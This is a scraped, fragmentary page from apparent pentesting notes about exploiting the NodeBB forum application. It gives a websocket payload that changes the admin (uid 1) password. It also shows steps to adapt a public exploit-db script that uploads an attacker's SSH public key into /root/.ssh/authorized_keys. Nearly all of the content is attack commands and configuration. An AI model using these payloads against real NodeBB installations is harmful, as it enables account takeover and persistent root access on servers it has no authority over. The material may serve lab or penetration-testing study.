NodeBB
Exploiting NodeBB Forum Web Application
Admin Account Takeover






Aribitrary File Upload






Last updated
Exploiting NodeBB Forum Web Application












Last updated
426["user.changePassword",{"currentPassword":"p@ssword1","newPassword":"p@ssword2","uid":1}]cp /usr/share/exploitdb/exploits/multiple/webapps/49813.py nodebbexploit.py
vim nodebbexploit.pyTARGET = 'http://192.168.1.1:4567'
USERNAME = 'admin'
PASSWORD = 'password'
DESTINATION_FILE = '/root/.ssh/authorized_keys'
SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub'